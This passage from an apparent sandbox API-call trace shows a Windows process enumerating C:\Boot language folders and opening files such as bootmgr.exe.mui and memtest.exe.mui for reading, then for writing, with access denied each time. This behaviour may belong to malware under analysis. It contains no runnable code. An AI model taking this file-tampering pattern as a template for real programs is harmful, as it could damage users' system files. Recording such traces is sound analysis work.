lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0082.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0082.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0082.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0082.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0082.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0082.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0082.784] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.784] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.784] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.784] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0082.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.784] AreFileApisANSI () returned 1 [0082.784] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\da-DK\\memtest.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\da-DK\\memtest.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0082.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0082.784] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.784] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0082.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0082.784] AreFileApisANSI () returned 1 [0082.784] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88428, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0082.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x534d8 [0082.784] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88428, cbMultiByte=-1, lpWideCharStr=0x534d8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\da-DK\\memtest.exe.mui") returned 30 [0082.785] CreateFileW (lpFileName="C:\\Boot\\da-DK\\memtest.exe.mui" (normalized: "c:\\boot\\da-dk\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0082.785] GetFileType (hFile=0x430) returned 0x1 [0082.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0082.785] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0082.785] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0082.786] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0082.786] CloseHandle (hObject=0x430) returned 1 [0082.786] AreFileApisANSI () returned 1 [0082.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88428, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0082.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53718 [0082.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88428, cbMultiByte=-1, lpWideCharStr=0x53718, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\da-DK\\memtest.exe.mui") returned 30 [0082.786] CreateFileW (lpFileName="C:\\Boot\\da-DK\\memtest.exe.mui" (normalized: "c:\\boot\\da-dk\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.786] GetLastError () returned 0x5 [0082.786] GetLastError () returned 0x5 [0082.786] SetLastError (dwErrCode=0x5) [0082.786] GetLastError () returned 0x5 [0082.786] SetLastError (dwErrCode=0x5) [0082.786] GetLastError () returned 0x5 [0082.786] SetLastError (dwErrCode=0x5) [0082.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0082.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0082.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0082.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0082.787] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.787] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.787] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x68d68, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧놠")) returned 0 [0082.787] FindClose (in: hFindFile=0x77fd0 | out: hFindFile=0x77fd0) returned 1 [0082.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0082.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0082.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0082.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0082.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x464a8 | out: hHeap=0x20000) returned 1 [0082.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0082.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0082.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0082.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0082.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.787] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.787] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.787] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.788] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.788] AreFileApisANSI () returned 1 [0082.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\de-DE", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\de-DE", lpUsedDefaultChar=0x0) returned 14 [0082.788] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.788] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0082.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0082.788] AreFileApisANSI () returned 1 [0082.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0082.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88658 [0082.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88658, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\de-DE") returned 14 [0082.788] CreateFileW (lpFileName="C:\\Boot\\de-DE" (normalized: "c:\\boot\\de-de"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.788] GetLastError () returned 0x5 [0082.788] GetLastError () returned 0x5 [0082.788] SetLastError (dwErrCode=0x5) [0082.788] GetLastError () returned 0x5 [0082.788] SetLastError (dwErrCode=0x5) [0082.788] GetLastError () returned 0x5 [0082.788] SetLastError (dwErrCode=0x5) [0082.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.789] AreFileApisANSI () returned 1 [0082.789] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0082.789] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88798 [0082.789] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88798, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\de-DE") returned 14 [0082.789] CreateFileW (lpFileName="C:\\Boot\\de-DE" (normalized: "c:\\boot\\de-de"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.789] GetLastError () returned 0x5 [0082.789] GetLastError () returned 0x5 [0082.789] SetLastError (dwErrCode=0x5) [0082.789] GetLastError () returned 0x5 [0082.789] SetLastError (dwErrCode=0x5) [0082.789] GetLastError () returned 0x5 [0082.789] SetLastError (dwErrCode=0x5) [0082.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0082.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0082.789] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.789] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.789] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.789] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.789] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.789] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0082.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.789] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef555ff8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef555ff8, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0082.789] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0082.789] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.789] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.789] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0082.790] FindFirstFileExW (in: lpFileName="C:\\Boot\\de-DE\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78190 [0082.790] FindNextFileW (in: hFindFile=0x78190, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0009692, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef538bee, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0082.790] FindNextFileW (in: hFindFile=0x78190, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48079da, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13560, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0082.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0082.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0082.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0082.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0082.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0082.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0082.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0082.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45fd8 [0082.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0082.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0082.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0082.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0082.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0082.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0082.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0082.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0082.791] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.791] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.791] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.791] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0082.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0082.791] AreFileApisANSI () returned 1 [0082.791] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\de-DE\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\de-DE\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0082.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.791] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.791] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0082.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0082.791] AreFileApisANSI () returned 1 [0082.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0082.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x534d8 [0082.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x534d8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 30 [0082.791] CreateFileW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0082.791] GetFileType (hFile=0x430) returned 0x1 [0082.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0082.792] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0082.792] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0082.792] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0082.792] CloseHandle (hObject=0x430) returned 1 [0082.792] AreFileApisANSI () returned 1 [0082.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0082.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53838 [0082.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x53838, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 30 [0082.792] CreateFileW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.793] GetLastError () returned 0x5 [0082.793] GetLastError () returned 0x5 [0082.793] SetLastError (dwErrCode=0x5) [0082.793] GetLastError () returned 0x5 [0082.793] SetLastError (dwErrCode=0x5) [0082.793] GetLastError () returned 0x5 [0082.793] SetLastError (dwErrCode=0x5) [0082.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0082.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0082.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0082.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.793] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.793] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.793] FindNextFileW (in: hFindFile=0x78190, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef538bee, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2ef7268, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0082.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0082.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0082.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0082.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0082.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0082.793] HeapFree (in: 